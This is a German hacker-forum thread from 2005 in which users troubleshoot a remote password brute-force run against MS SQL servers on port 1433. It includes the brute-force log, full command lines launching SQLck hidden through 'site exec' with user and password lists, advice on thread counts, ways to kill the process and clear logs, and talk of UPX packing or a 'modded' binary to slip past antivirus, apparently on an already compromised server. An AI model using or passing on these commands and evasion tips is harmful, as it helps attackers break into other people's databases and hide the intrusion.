remote Bruten, komischer log

Sypherxtc · 24. Juli 2005

Hi

hab mal ne kurze frage und zwar wenn ich remote brute dann klappt anfangs alles aber nach ca 2min sihte der log nur noch so aus:

Code:

xxx.201.xx.186:1433 - Cant Connect (fast-check) (0)
xxx.201.xxx.218:1433 - Cant Connect (fast-check) (0)
xxx.200.xxxx.40:1433 - Cant Connect (fast-check) (0)(1)socket (1412:0) got error 0 :: 10061
(1)socket (3768:0) got error 0 :: 10061
(1)socket (2376:0) got error 0 :: 10061
(1)socket (3540:0) got error 0 :: 10061
(1)socket (2376:0) got error 0 :: 10061
(1)socket (240:0) got error 0 :: 10061
ERR: Can't set FIONBIO option on new socket (error 10038)(xxx.201.xxx.205)
(-1)socket (2992:0) got error 10038
(-1)socket (2168:0) got error 10038
(-1)socket (2168:0) got error 10038
(1)socket (3416:0) got error 0 :: 10061
(1)socket (2768:0) got error 0 :: 10061
(1)socket (2464:0) got error 0 :: 10061
(-1)socket (496:0) got error 10038
(1)socket (3324:0) got error 0 :: 10061
(1)socket (3276:0) got error 0 :: 10061
(1)socket (3564:0) got error 0 :: 10061
(1)socket (1872:0) got error 0 :: 10061
(1)socket (3540:0) got error 0 :: 10061
In the last 1.00 min: 0.00 IPs/sec 150.77 Pass/sec 104.50 KB/s
usw usw

aber am anfang brutet er noch gescheit aber dann nur noch das!

Woran liegt das?

Gruss Sypher

Anzeige

firefighter · 24. Juli 2005

Brute mal mit weniger Threads, ich denke es liegt daran.

Sypherxtc · 24. Juli 2005

wo stell ich die thredas ein?

mein start befehl ist zur zeit

"site exec hidden32.exe svcsql.exe -i scan.txt -u user.txt -p masterbrute.txt -o extract.txt"

udn noch ne frage! ich kann den brute prozess net stopen wenn ich "site exec kill.exe svcsql.exe" eingebe killt er ihn net und er brutet weiter und ich kann die alten logs usw net löschen!
Wie kill ich es?

Code:

[R] DELE SQLck_Logfile.txt
[R] 550 C:/pfad/Bruting/SQLck_Logfile.txt: Cannot delete file.

Gruss sypher

firefighter · 24. Juli 2005

Also ich nutze SQLck, da kann man die Threadzahl einstellen...

Code:

site exec HIDDEN32.exe SQLck.exe -i scans.txt -u sql_user.txt -p sql_pass.txt -o brutedscans.txt -t 50

Die "50" gibt die Threadzahl an. Mach das mal mit 30, dann sollte es keine Probleme geben.

Das Problem mit dem Beenden hab ich allerdings auch, beim Scannen das selbe. Das einzigste was bisher geholfen hat war n Neustart des Servers, was aber risikoreich ist.

Sypherxtc · 24. Juli 2005

hm hab es jetzt per sqlexec gekillt!

ok thx^^
werds mal so versuchen!

das prob ist das meine sqlck immer wnen ich sie hochgeladen hab net angezigt wird aber es läuft auch kein AV!
ka warum es net geht, hab s auch schon mit upx gepackt! Abe rgeht trotzdem net!
kannst mir mal deine uppen, will nur wissen ob es an meine sqlck liegt!

Gruss Sypher

fissy · 24. Juli 2005

also ein remote stro mit dem speed oben kann 500 und mehr threads machen, das log ist voll normal

Sypherxtc · 24. Juli 2005

hm ok wenn das normal ist ok^^

dann lass ich ihn mal mit 150 threads bruten^^

danke hast ne 10

fire dich hab ich schon bewertet^^

Gruss Sypher

firefighter · 24. Juli 2005

Woher willst du das wissen? Wenn das File nicht angezeigt (gelöscht) wird läuft auf jeden Fall nen AV.

Sypherxtc · 24. Juli 2005

währe ein AV drauf, währe meine clearlogs,scan500 und scan1000 auch weg! Aber da smit dem net da sien war schon auf mehren servern und ich hab den kompletten server nach nem Av abgesucht!

Gruss Sypher

firefighter · 24. Juli 2005

Hm das is echt komisch, hatte ich noch nie.

fissy · 25. Juli 2005

schonmal ne gemoddete sqlck.exe probiert?

Sypherxtc · 25. Juli 2005

ich find keine =/

und leider kenn ich mich mit dem modden von dos progz net so aus!

Kannst mir sagen wie?

oder wo ich eine finde?

Gruss Sypher

Nützliche Suchen

remote Bruten, komischer log

Videos zum Themenbereich